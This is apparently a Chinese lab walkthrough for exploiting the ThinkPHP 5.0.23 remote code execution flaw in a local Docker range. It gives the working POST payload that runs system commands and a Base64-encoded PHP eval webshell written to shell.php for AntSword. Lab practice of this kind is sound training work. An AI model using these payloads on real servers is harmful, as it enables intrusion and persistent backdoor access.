步骤一：.执行以下命令启动靶场环境并在浏览器访问

cd thinkphp/5.0.23-rce
docker-compose up -d
docker ps

步骤二：访问靶机环境

步骤三：/index.php?s=captcha

步骤四：利用HackBar

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir

步骤五：通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码

步骤六：发送POST 请求

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php

步骤七：访问shell.php

步骤八：进行蚁剑连接